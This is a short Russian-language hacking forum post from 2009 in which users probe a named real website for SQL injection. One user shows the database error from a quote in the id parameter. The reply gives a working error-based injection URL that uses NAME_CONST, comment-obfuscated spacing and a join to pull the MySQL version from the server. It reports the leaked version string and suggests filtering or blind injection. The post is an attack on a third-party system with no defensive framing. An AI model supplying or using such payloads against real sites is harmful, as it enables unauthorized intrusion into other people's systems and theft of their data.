12.11.2009, 22:23
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
Сообщение от fng
Посмотрите еще вот это плиз
www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700
почему так происходит?
Код:
http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)
Последний раз редактировалось [x60]unu; 12.11.2009 в 22:33..
|
|
|